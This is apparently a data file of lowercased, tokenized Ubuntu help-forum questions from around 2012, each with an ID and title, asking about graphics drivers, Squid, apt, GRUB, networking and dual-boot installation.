136015	problem with squid on ec2	i created an instance from the canonical ami that have ubuntu server 12.04 64bit and install squid . the only changed to the /etc/squid3/squid.conf file was : acl localhost src 127.0.0.1/32 : :1 per acl localhost src 127.0.0.1/32 : :1 my_ip_address and i ca n't use the squid from my_ip_address . any idea what the problem is ? what other thing i must change ? i can connect using telnet to the 3128 port perfectly and when i type some garbage and type enter squid reply some html and log the following : 1336796623.133 0 my_ip_address none/400 4016 none error : invalid-request - none/- text/html so no firewall problem neither squid.conf syntax error . beside , i did the same thing with an ubuntu server using virtualbox and all work fine . from the ec2 instance telnet google 80 and all is fine , so no outside connection problem neither . the rare thing is that squid logs do n't put anything . any idea ?
136016	apt-get update size too big	since i installed ubuntu 12.04 precise x64 , the apt-get update size is killing me.. since i 'm stuck with a slow connection , its a pain to download ~12mb everytime . even if i run it twice back to back , it still downloads ~12mb . i 've read some other 2-4 threads here and at ubuntuforums concerning the same issue and have already commented out the source line ( there were 2 only of these ) in sources.list file but it still no joy.. is it just because 12.04 is so new now and receiving frequent updates ? earlier when i used 10.04 , there was no any problem like that ... my sources.list and apt-get update log below : > # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/main/binary-i386/ > > # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/restricted/binary-i386/ > # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / precise main restricted > > # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to > # newer versions of the distribution . deb http : //in.archive.ubuntu.com/ubuntu/ precise main restricted > > # # major bug fix updates produced after the final release of the > # # distribution . deb http : //in.archive.ubuntu.com/ubuntu/ precise-updates main restricted > > # # n.b . software from this repository is entirely unsupported by the ubuntu > # # team . also , please note that software in universe will not receive any > # # review or updates from the ubuntu security team . deb http : //in.archive.ubuntu.com/ubuntu/ precise universe deb > http : //in.archive.ubuntu.com/ubuntu/ precise-updates universe > > # # n.b . software from this repository is entirely unsupported by the ubuntu > # # team , and may not be under a free licence . please satisfy yourself as to > # # your rights to use the software . also , please note that software in > # # multiverse will not receive any review or updates from the ubuntu > # # security team . deb http : //in.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //in.archive.ubuntu.com/ubuntu/ precise-updates > multiverse > > # # n.b . software from this repository may not have been tested as > # # extensively as that contained in the main release , although it includes > # # newer versions of some applications which may provide useful features . > # # also , please note that software in backports will not receive any review > # # or updates from the ubuntu security team . > > deb http : //security.ubuntu.com/ubuntu precise-security main restricted > deb http : //security.ubuntu.com/ubuntu precise-security universe deb > http : //security.ubuntu.com/ubuntu precise-security multiverse > > # # uncomment the following two lines to add software from canonical's > # # 'partner ' repository . > # # this software is not part of ubuntu , but is offered by canonical and the > # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner > # deb-src http : //archive.canonical.com/ubuntu precise partner > > # # this software is not part of ubuntu , but is offered by third-party > # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main > # deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //in.archive.ubuntu.com/ubuntu/ precise-backports restricted main > multiverse universe sudo apt-get update ign http : //extras.ubuntu.com precise inrelease ign http : //archive.canonical.com precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //dl.google.com stable inrelease ign http : //in.archive.ubuntu.com precise inrelease ign http : //in.archive.ubuntu.com precise-updates inrelease ign http : //in.archive.ubuntu.com precise-backports inrelease ign http : //security.ubuntu.com precise-security inrelease hit http : //extras.ubuntu.com precise release.gpg hit http : //archive.canonical.com precise release.gpg hit http : //ppa.launchpad.net precise release.gpg get:1 http : //dl.google.com stable release.gpg [ 198 b ] get:2 http : //in.archive.ubuntu.com precise release.gpg [ 198 b ] get:3 http : //security.ubuntu.com precise-security release.gpg [ 198 b ] hit http : //extras.ubuntu.com precise release hit http : //archive.canonical.com precise release hit http : //ppa.launchpad.net precise release.gpg get:4 http : //dl.google.com stable release [ 1,347 b ] get:5 http : //in.archive.ubuntu.com precise-updates release.gpg [ 198 b ] get:6 http : //security.ubuntu.com precise-security release [ 49.6 kb ] hit http : //ppa.launchpad.net precise release.gpg get:7 http : //dl.google.com stable/main amd64 packages [ 1,245 b ] hit http : //archive.canonical.com precise/partner amd64 packages hit http : //extras.ubuntu.com precise/main amd64 packages get:8 http : //in.archive.ubuntu.com precise-backports release.gpg [ 198 b ] hit http : //ppa.launchpad.net precise release get:9 http : //dl.google.com stable/main i386 packages [ 1,268 b ] hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex hit http : //archive.canonical.com precise/partner i386 packages ign http : //archive.canonical.com precise/partner translationindex get:10 http : //in.archive.ubuntu.com precise release [ 49.6 kb ] ign http : //dl.google.com stable/main translationindex hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release get:11 http : //in.archive.ubuntu.com precise-updates release [ 49.6 kb ] hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex get:12 http : //in.archive.ubuntu.com precise-backports release [ 49.6 kb ] get:13 http : //security.ubuntu.com precise-security/main amd64 packages [ 32.9 kb ] ign http : //dl.google.com stable/main translation-en_in ign http : //extras.ubuntu.com precise/main translation-en_in ign http : //archive.canonical.com precise/partner translation-en_in ign http : //dl.google.com stable/main translation-en get:14 http : //in.archive.ubuntu.com precise/main amd64 packages [ 1,273 kb ] ign http : //extras.ubuntu.com precise/main translation-en ign http : //archive.canonical.com precise/partner translation-en get:15 http : //security.ubuntu.com precise-security/restricted amd64 packages [ 14 b ] get:16 http : //security.ubuntu.com precise-security/universe amd64 packages [ 8,581 b ] get:17 http : //security.ubuntu.com precise-security/multiverse amd64 packages [ 1,142 b ] get:18 http : //security.ubuntu.com precise-security/main i386 packages [ 32.9 kb ] get:19 http : //security.ubuntu.com precise-security/restricted i386 packages [ 14 b ] get:20 http : //security.ubuntu.com precise-security/universe i386 packages [ 8,594 b ] get:21 http : //security.ubuntu.com precise-security/multiverse i386 packages [ 1,393 b ] hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //security.ubuntu.com precise-security/universe translationindex hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //security.ubuntu.com precise-security/universe translation-en ign http : //ppa.launchpad.net precise/main translation-en_in ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_in ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_in ign http : //ppa.launchpad.net precise/main translation-en get:22 http : //in.archive.ubuntu.com precise/restricted amd64 packages [ 8,452 b ] get:23 http : //in.archive.ubuntu.com precise/universe amd64 packages [ 4,786 kb ] get:24 http : //in.archive.ubuntu.com precise/multiverse amd64 packages [ 119 kb ] get:25 http : //in.archive.ubuntu.com precise/main i386 packages [ 1,274 kb ] get:26 http : //in.archive.ubuntu.com precise/restricted i386 packages [ 8,431 b ] get:27 http : //in.archive.ubuntu.com precise/universe i386 packages [ 4,796 kb ] get:28 http : //in.archive.ubuntu.com precise/multiverse i386 packages [ 121 kb ] hit http : //in.archive.ubuntu.com precise/main translationindex hit http : //in.archive.ubuntu.com precise/multiverse translationindex hit http : //in.archive.ubuntu.com precise/restricted translationindex hit http : //in.archive.ubuntu.com precise/universe translationindex get:29 http : //in.archive.ubuntu.com precise-updates/main amd64 packages [ 95.2 kb ] get:30 http : //in.archive.ubuntu.com precise-updates/restricted amd64 packages [ 757 b ] get:31 http : //in.archive.ubuntu.com precise-updates/universe amd64 packages [ 27.5 kb ] get:32 http : //in.archive.ubuntu.com precise-updates/multiverse amd64 packages [ 1,142 b ] get:33 http : //in.archive.ubuntu.com precise-updates/main i386 packages [ 96.5 kb ] get:34 http : //in.archive.ubuntu.com precise-updates/restricted i386 packages [ 770 b ] get:35 http : //in.archive.ubuntu.com precise-updates/universe i386 packages [ 27.7 kb ] get:36 http : //in.archive.ubuntu.com precise-updates/multiverse i386 packages [ 1,393 b ] hit http : //in.archive.ubuntu.com precise-updates/main translationindex hit http : //in.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //in.archive.ubuntu.com precise-updates/restricted translationindex hit http : //in.archive.ubuntu.com precise-updates/universe translationindex get:37 http : //in.archive.ubuntu.com precise-backports/main amd64 packages [ 559 b ] get:38 http : //in.archive.ubuntu.com precise-backports/restricted amd64 packages [ 14 b ] get:39 http : //in.archive.ubuntu.com precise-backports/universe amd64 packages [ 1,387 b ] get:40 http : //in.archive.ubuntu.com precise-backports/multiverse amd64 packages [ 14 b ] get:41 http : //in.archive.ubuntu.com precise-backports/main i386 packages [ 559 b ] get:42 http : //in.archive.ubuntu.com precise-backports/restricted i386 packages [ 14 b ] get:43 http : //in.archive.ubuntu.com precise-backports/universe i386 packages [ 1,391 b ] get:44 http : //in.archive.ubuntu.com precise-backports/multiverse i386 packages [ 14 b ] hit http : //in.archive.ubuntu.com precise-backports/main translationindex hit http : //in.archive.ubuntu.com precise-backports/multiverse translationindex hit http : //in.archive.ubuntu.com precise-backports/restricted translationindex hit http : //in.archive.ubuntu.com precise-backports/universe translationindex hit http : //in.archive.ubuntu.com precise/main translation-en hit http : //in.archive.ubuntu.com precise/multiverse translation-en hit http : //in.archive.ubuntu.com precise/restricted translation-en hit http : //in.archive.ubuntu.com precise/universe translation-en hit http : //in.archive.ubuntu.com precise-updates/main translation-en hit http : //in.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //in.archive.ubuntu.com precise-updates/restricted translation-en hit http : //in.archive.ubuntu.com precise-updates/universe translation-en hit http : //in.archive.ubuntu.com precise-backports/main translation-en hit http : //in.archive.ubuntu.com precise-backports/multiverse translation-en hit http : //in.archive.ubuntu.com precise-backports/restricted translation-en hit http : //in.archive.ubuntu.com precise-backports/universe translation-en fetched 12.9 mb in 19min 51s ( 10.8 kb/s ) reading package lists ... done
136020	12.04 dashboard 's search opens program as text file rather than running as app	i have a program called df , which is in /home/isaac/df_linux , which i run this to play the game . running from here the dashboard search , found by pressing , will run df as a gedit text file . if i put it in /home/isaac/.df_linux the dashboard wont even see the df file . is there a proper way for the dash to find and execute my game ? thank you ! ! ! !
136024	how to stop nautilus from creating thumbnails of specific file types ?	i 'm trying to stop nautilus from creating thumbnails of pdf files . in another thread on 'ubuntu forums ' someone said to open gconf-editor and disable the pdf entry in the '/desktop/gnome/thumbnailers ' directory . however the only entry in that dir is disable all . needless to say i do n't want that . how can i disable the thumbnails for a specific file type ?
136029	libreoffice calc - background fill options all white	whenever i try to modify a cell background in calc ( format > format cell > background ) , all of the color options are set to white . how do i get the palette back ? i am using ubuntu 12.04 with libreoffice 3.5.2.2 build id : 350m1 ( build:202 ) .
136030	emacs , which to use ?	there seem to be the following versions : emacs23 , emacs23-nox , e3 , emacs23-lucid , and jove , as choices to download . where can i find out what the differences are ?
136031	software center and command line	can somebody explain me what is `` install it from software center '' , and `` install from a command line '' please ? . i was using another os and only two days on ubuntu.please help me .
136035	can i install ubuntu on a logical partition ? what will be the advantage or disadvantage of using a logical partition to install ubuntu 12.04 ?	here are the screen-shots of what i have done so far using gparted . before editing the file system : after editing the file system : file system view from windows 7 x64 . now my question is , should i install ubuntu 12.04 in this partition or shrink the c : drive ( sda1 ) to free up some space and install ubuntu there ? is there any advantage of installing ubuntu on a primary drive or is there any disadvantage of installing ubuntu on a logical drive ?
136037	12.04 lts live cd splash screen hangs	i tried to put ubuntu 12.04 lts on a clean hard drive and when i try to boot to the cd the splash screen hangs . i 've tried it on 3 different computers ( all with 1 gb of ram ) . 11.10 worked fine .
136042	hitting screenshot key does not give a preview	back on 11.10 , whenever i would take a screenshot , there would be a preview that gave me the option to either copy to a clipboard , save image wherever i wanted to , or cancel ( in case i bumped the prntscrn key by accident ) . but , i 'm on 12.04 and that option seems to be gone . whenever i press prntscrn , it does the typical sound and flash , but i do n't get the preview . i originally thought that this option was removed from ubuntu , but whenever i was helping my brother on his new 12.04 install , i found that the key gives the preview on his computer . he has a brand new 12.04 install , but i have a 12.04 install that was upgraded from 11.10 . does anyone have any ideas what may be wrong ?
136043	touchpad scrolling does n't work on an acer aspire 1410	i can not scroll using my touchpad . i am using acer aspire 1410 . i tried this but it does n't work in my computer . thanks in advance . this is lspci : 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m-e lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 01:00.0 ethernet controller : atheros communications inc. ar8131 gigabit ethernet ( rev c0 ) 02:00.0 network controller : intel corporation centrino wireless-n 1000 in the mouse and touchpad settings , there 's no touchpad tab . and there 's no 'synaptic touchpad configuration ' to install . i installed 'tpconfig ' , but it did n't make any difference .
136044	how do i change the background color of the menu bar ?	i 'm trying to change the background color of the menu bar in ubuntu but no luck . my current theme is ambiance . i 've tried to change the file named gtkrc in the ambiance theme folder but no luck . any ideas on how i can do this ?
136045	ubuntu 12.04 wo n't recognize my graphics driver	i 've installed nvidia current ( it works mostly ) but the details section of the system settings shows that my driver is standard and the version is unknown . i 'm getting a lot of errors and compiz has crashed at least twice . any help ? what other information should i provide ?
136046	why wo n't 12.04 install beside my windows7 ?	i have an hp pavilion pc with a 1.3 tb hard drive hosting windows7 professional . i have a couple external fat32 format drives i use for backups as well . when i attempted to install ubuntu 12.04 beside the existing os , the only option i got was to put it on one of the external drives . if i went to the advanced options , it would show the internal drive . any ideas why it wo n't let me install there ?
136051	how to record from 2 microphones to create a virtual environment ( binaural recording )	i wish to make a recording using 2 microphones positioned at a distance mentioned here : http : //en.wikipedia.org/wiki/binaural_recording so i can make a `` 3d sound '' recording . how can i configure ubuntu or what should i install in ubuntu so i can make this doable . i want to make sound recordings that when the user puts on the headphones the binaural recording effects takes place . similar to the famous virtual barber shop video : http : //www.youtube.com/watch ? v=iudtlvagjja where you put on your headphones and close you eyes and your brain starts to process the environment in a way that you feel you are in that virtual place .
136052	cycle windows over all workspaces in xfce ( while being able to cycle over one workspace )	i am aware of the xfwm4 - > general - > cycle_workspaces setting but i want to have two shortcuts : cycles over the windows of the current workspace cycles over the windows of all workspaces
136054	bad 3d performance in ubuntu 12.04	i already posted a question before but i did n't really get any advice/help . i 'll be a bit more brief/general in hope it 'll help . i have an msi hd 7850 with the catalyst 12.4 drivers installed . i 've found that i 'm having bad 3d performance for some reason but i 'm not entirely sure what . i suspect it may just that the graphics card is new and amd just need to work on their drivers but it would be nice to get advice and narrow the problem down so that i can be sure rather than wait for driver updates that may not even help . i ran gxlgears to give some general idea of how bad the performance is . at default size it is averaging around 2000 fps . the command glxinfo confirms the renderer is using amd radeon hd 7800 series with opengl version 4.2 . edits below : as asked for others : lspci -v output is here . fglrxinfo output is here xvinfo output is here glxinfo | grep rendering says yes for direct rendering . these confirmed that everything was configured correctly . within unity and gnome classic : glxgears had an fps of around 2000 fps fgl_glxgears had an fps of around 544 fps within ldxe : glxgears had an fps of around 4600 fps fgl_glxgears had an fps of around 1600 fps in the end it was discovered that compiz was causing a large performance decrease and solution was simply to change window manager for the time being . thanks to techzilla for all his help !
136058	which option should i choose while installing ubuntu 12.04 along with windows 7 x64 ?	this image shows the options that i can choose . which should be the best and minimal to install ubuntu 12.04 along with windows 7 x64 . if you can explain things using screen-shots it will be better . i do not want to set anything manually . choosing which option can make ubuntu 12.04 automatically set the bootloader settings for windows and ubuntu itself ? here is a another question that shows the screen-shots of my hdd allocation tables : can i install ubuntu on a logical partition ? what will be the advantage or disadvantage of using a logical partition to install ubuntu 12.04 ?
136062	permanent custom keyboard shortcuts for evince ( document viewer )	i am using the ubuntu document viever evince . lately , i found out how to add custom keyboard shortcuts for the program . i was searching for a way to add a shortcut e.g . for view / best fit ( also available as a button ) . what i found was the keyboard shortcut page which describes how to setup shortcuts using gconf-editor . that worked as described . however , once i restart my system the shortcuts are gone . how can i set them permanently ?
136063	fonts are not properly displayed in x applications	why my r is looking like r ? just look at the images
136070	is it possible to completely disable grub timeout ?	i am setting up a dual boot install for my wife 's computer . i would like to disable the timeout for selecting os that defaults to ubuntu so the computer wont boot without making a selection . ( ie . grub_timeout=infinite ) is it just a simple case of leaving it blank or # out the line in /etc/default/grub ? i want it so my wife can choose os easily on her newly dual booting pc . i would also like to know if updating burg after this would keep the change - as the big graphics of the os 's are a little more noob friendly .
136071	is this wubi ? what is `` installation size '' setting for ?	i 'm new to ubuntu ... i went to the downloads page and downloaded the windows installer as i am hoping initially to have a dual boot on my currently win 7 pc ( i would consider preserving my win7 install as a vm under ubuntu instead - advice ? ) it 's asking me to choose an `` installation size '' but there 's no explanation as to what the significance of this is . is this a disc partition ? can i increase it easily later if it 's too small ? i came here to ask these questions and now i see a bunch of threads about 'wubi ' and possible downsides of installing ubuntu this way . is the windows installer i just downloaded going to give me wubi ?
136072	how can i restart the `` mobile brodband '' / modem ? is it possible without restarting the whole system ?	i have no clue is there anything like i asked or not . i often use nokia n72 to connect to the internet . the problem im facing is , after two or three hrs the modem automatically disconnects . i can not fix it by restarting the phone . rather i always had to restart the whole system . its very annoying . after restart i can reconnect n72 and it works fine . is there a fix to this ?
136073	new field in /proc/stat for cpu	today a application that i have crashed . i went to check why and is because a new field in /proc/stat : cpu 635570 3943 1264332 13562455 65965 80 4806 0 0 0 cpu0 311689 2102 654770 6755602 32431 38 4127 0 0 0 cpu1 323881 1840 609562 6806853 33534 41 678 0 0 0 the last 0 is undocumented , at least in the man page . does anyone know what is it ? i 'm running now in ubuntu 12.04 , and before in 10.04 .
136075	networking stopped working on ubuntu 10.04	i am using ubuntu 10.04 and it was working fine until recently that i had problems with my graphic card which i fixed it and now i have problems with internet connection . i have no internet connection , no wireless no lan . it is interesting for me since it was working two weeks ago and it suddenly stopped working . also i do n't have any problems in my windows . can you please help me to find the problem ? i can send you screen shots if you need me to run any commands ... thanks , here 's the outputs for the following commands : ifconfig ; cat /etc/network/interfaces ifconfig ethx up ( tried both eth0 , and eth1 ) ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:744 errors:0 dropped:0 overruns:0 frame:0 tx packets:744 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:57160 ( 57.1 kb ) tx bytes:57160 ( 57.1 kb ) cat /etc/network/interfaces auto lo iface lo inet loopback ifconfig eth0 up eth0 : error while getting interface flags : no such device
136078	unity 2d vs 3d and launcher icon resizing	i have a ubuntu 12.04 image on a flash drive . when i boot from that , i 'm able to resize the icons in my launcher , and windows snap to half the screen . i assume this means that i 'm running ubuntu 3d . i just upgraded from ubuntu 11.04 up to 12.04 ( not a fresh install ) . running the ubuntu 12.04 installed on my hard drive , i am not able to resize the icons in my launcher nor snap the windows to half the screen . this command seems to say i 'm in ubuntu 2d , even though i have tried logging out , and specifically logging in with the regular ubuntu rather than ubuntu-2d . $ echo $ desktop_session ubuntu-2d how do i get the ubuntu installation i have on my hard drive to act like the one i ran from the flash drive ? ===================================== update : here is the output of the debugging commands , as requested . $ cat /var/log/xorg.0.log output in : http : //pastebin.ubuntu.com/984475/ $ lspci -nn | grep vga 2.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) $ /usr/lib/nux/unity_support_test -p xlib : extension `` glx '' missing on display `` :0.0 '' . error : glx is not available on the system if anyone needs anything else , let me know . i do n't really know what is important for this issue .
136079	nvidia graphics resolution problem	i am currently using ubuntu 12.04 i have acer aspire timelinex 3830tg with 2gb nvidia geforce gt540m graphics card to enable my graphics card i followed following steps . 1 . ) i activated nvidia_current and nvidia_current_updates from additional drivers 2 . ) sudo nvidia-xconfig 3 . ) then reboot following these steps i got following errors 1 . ) my resolution is 640x480 ... ( there is no option of 1366x768 in display ... previously there was 1366x768 when nvidia-xconfig command was not entered ) 2 . ) when i open nvidia-settings it shows me following error `` you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run 'nvidia-xconfig ' as root ) and restart the x server . '' problem need to be solved 1 . ) change resolution to 1366x768 2 . ) also how to check my nvidia graphics working or not please some one please help me to solve these issues ... i am seriously in need of my graphics card ... i wa n't my nvidia graphics card work as my intel graphics smoothly i am not willing to use bumblebee with regards , ubuntu user
136083	how do i make sure the driver for a tp-link tl-wn727n is loaded on boot ?	last week i bought this adpator and had trouble getting it to work . new tp-link tn-wn727n usb wireless stick , how do i get it working ? but thanks to some help got it running . however the main issue now is that while the device works with the sudo modprobe -v rt2800usb , i 'm having to input it every time i reboot the system . is there anything i can do to make this work automatically after a reboot .
136084	having issues installing ubuntu	it is taking an incredibly long time to try and install and now i am currently waiting at the twitter installation section but the progress bar has gone . any help would be appreciated .
136085	nautilus toolbar icons became bigger	i had installed mac4linux from here i didnt like it that much so i removed it . after removing it my nautilus toolbar icons have become large previously it used to look like this with small icons and a path viewer how do i get it back ? edit i realised this is not only happening in nautilus but also in all other apps like rhythmbox , pinta etc edit2 i got the pathfinder thingy
136086	webgl and hardware acceleration problems	i am currently running ubuntu 12.04 and in windows 7 on my ati mobility radeon 4300 series graphics card webgl and hardware acceleration worked perfectly fine . now on ubuntu 12.04 i have tried both the open-source drivers and the fglrx drivers and it no longer works . could somebody please help ? i use google chrome 18
136087	does a upgrade from 11.10 to 12.04 updates a ( manual ) grub installation to grub2 ?	i have a lenovo ideapad s205 , which has difficulties with grub2 . therefore i did a manual installation of grub 0.97 . will a upgrade from 11.10 to 12.04 destroy my old grub or will it respect the custom installation ?
136089	how to set up bridged networking in xen ?	i have 2 domu virtual machines installed on a 11.10 oneiric dom0 . my internal network is on the 192.168.1 subnet , and when the domu 's start , they get ips on the 192.168.122 subnet . i have attempted to follow the instructions here : http : //wiki.kartbuilding.net/index.php/xen_networking xend-config.sxp is configured correctly , but neither of my domu 's have a config file in /etc/xen to modify . ifconfig reports that i have the following devices : eth0 , lo , tap3.0 , vif3.0 , vif4.0 , virbr0 bridge-utils is installed . i also just attempted to follow these steps : http : //serverfault.com/questions/233201/bringing-the-xenbr0-interface-up-on-xen-under-ubuntu-8-04 sudo brctl addbr xenbr0 sudo brctl addif xenbr0 vif3.0 device vif3.0 is already a member of a bridge ; ca n't enslave it to bridge xenbr0 . any ideas on next steps are greatly appreciated !
136090	does ubuntu update the installation media ?	when ubuntu publishes a patch to packages , do they update the install media ? if i download a `` live cd '' , will it be pre-patched ? what about sru ( stable release updates ) ?
136093	extremely low 3d perfomance	i recently bought a radeon hd 6850 and installed a fresh version of 12.04 on my computer . it has 4gb ram , a somewhat fast cpu and a suprisingly fast s-ata hdd . however i noticed that my 3d performance is extremely low , which causes the whole system to be slow . as mentioned in this question , glgears has an average fps of 70 and fgl_glxgears an average of 45 . i am using unity 2d and have the supported driver from `` additional drivers '' installed . ( not the post-release one ) . fglrxinfo output : display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6800 series opengl version string : 4.2.11627 compatibility profile context glxinfo | grep rendering : direct rendering : yes xvinfo output i noticed this problem already when installing , so i tried the current release from amd 's website and an older one ( 11.x ) - both did n't work as intended , as they had some weird glitches sometimes . after that i reinstalled ubuntu , so there is nothing from that that could interfere . does anyone of you have an idea what is going on ? /edit : unity_support_test output : opengl vendor string : ati technologies inc. opengl renderer string : amd radeon hd 6800 series opengl version string : 4.2.11627 compatibility profile context not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes
136094	ubuntu boots but gives no screen	i got ubuntu 11.10 , with gnome-shell as desktop manager , and whenever i boot ( select ubuntu from grub , just so you know where we are ) it gives no screen , and if i wait a minute orso , and press the powerbutton , it will activate my screen and turn off ( normal way ) . now i found when i just turn it off in mid boot , then when i select ubuntu from grub ( not the recovery one ) it wil lcheck for errors , it will find no errors but my screen is turned on . i have no clue why my laptop does this . tl ; dr screen will only be turned on when there is a error check involved in the boot . anyone ? !
136100	sound from both headset and speaker	this is a common problem , i know but when i plug in my headset the sound keeps coming out of the speakers . the pc model is acer aspire 5930 . when i start the pc with the headset plugged in , the sound comes out right , but when i plug it in after i have turned it on the sound comes out everywhere . system is ubuntu 12.04 64 bit .
136106	is there a simple `` hello world '' for making games ?	does anyone know of a simple `` hello world '' for making games for ubuntu ? i 've seen the getting started with quickly video . any examples for platformers or something like that ? edit : just a recap of the answers . blender game engine -- uses python pygame -- python monogame http : //monogame.codeplex.com/ -- some sort of xna ? quakec -- this a quake flavored c like lang . see : steel storm http : //one.steel-storm.com/
136113	ubuntuone fails with attributeerror on windows7	i just installed ubuntuone on a machine at home , but when i tried to connect to my account i got attributeerror `` 'nonetype ' object has no attibute 'get_rootdir ' '' every time i start ubuntuone on that machine , i get that error and it does n't show any folders .
136122	how would you install openssl package for ruby ?	i have trouble finding the package for this software . i built and installed from the packages found here , but it 's still not working properly with rvm and gem ( log is located here ) . how would you suggest finding a package for this to work properly ? stanley @ ubuntu : ~/github/webdev_class/ruby $ sudo apt-cache search ^openssl [ sudo ] password for stanley : openssl-blacklist - blacklists for openssl rsa keys and tools openssl-blacklist-extra - non-default blacklists of openssl rsa keys libengine-pkcs11-openssl - openssl engine for pkcs # 11 modules libxmlsec1-openssl - openssl engine for the xml security library openssl - secure socket layer ( ssl ) binary and related cryptographic tools here is the printout after trying dpkg -l | grep openssl . stanley @ ubuntu : ~/github/webdev_class/ruby $ dpkg -l | grep openssl ii openssl 1.0.0e-2ubuntu4.5 secure socket layer ( ssl ) binary and related cryptographic tools ii python-openssl 0.12-1ubuntu1 python wrapper around the openssl library
136126	is it possible to update windows from ubuntu ?	i imagine that this is probably not possible , but worth asking because i 'd find it useful if it were ! i dual boot my system with ubuntu 12.04 and windows 7 . though i rarely nowadays use windows so whenever i do have to boot into it there are always lots of updates to install and i have to wait when shutting down for these to install before i can access ubuntu again . so i was wondering whether it would be possible to somehow keep windows updated in the background from ubuntu ? is there a way to mount the windows partition and run the window updater or is this way to complicated a task ?
136131	no_swt inputmethods eclipse/ubuntu 12.04	after i 've upgraded to ubuntu 12.04 , eclipse does n't show fonts properly and there are some problems with auto complete . new entry in the right click menu `` no_swt inputmethods ( no resource bundle ) '' . how i can restore my eclipse back ?
136139	`` xrandr : configure crtc 0 failed '' when trying to change resolution on external monitor	i 've been trying to set up an external monitor for a bit , finally got it mostly working except the resolution is off . my monitor 's native res is 1600x900 , which i finally got to show up in xrandr : user : ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1024 x 768 , maximum 1600 x 900 default connected 1024x768+0+0 0mm x 0mm 1024x768 0.0* 800x600 0.0 640x480 0.0 1600x900 59.9 however when i try to change the resolution i get the following error : user : ~ $ xrandr -- output default -- mode 1600x900 xrandr : failed to get size of gamma for output default xrandr : configure crtc 0 failed
136141	sound problems !	first off i am not getting any sound from my asus xonar ds ... it was working fine in windows 7 . after searching and not finding a solution i just puled the card out ... kind of a wast . now i have sound working through the motherboard but i am also getting sound through from the case speaker as well . i have never had this problem before . i am a bit new to unity ... so i could be missing the settings thank you .
